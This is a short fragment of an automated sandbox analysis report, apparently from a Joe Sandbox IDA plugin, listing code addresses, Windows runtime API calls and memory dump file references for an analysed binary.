    0x001428eb
    0x001428eb
    0x001428f1
    0x001428f7
    0x00142908

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00147BE0,00000008,00142975,00000000,00000000,?,00141E3B,00000003), ref: 0014287E
      • Part of subcall function 001430D6: __amsg_exit.LIBCMT ref: 001430F8
      • Part of subcall function 001430D6: EnterCriticalSection.KERNEL32(?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00143100
    • InterlockedIncrement.KERNEL32(00149320), ref: 001428BF
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 00144559
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 00144566
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 00144573
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 00144580
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 0014458D
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 001445A9
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(00000000), ref: 001445B9
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 001445CF
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd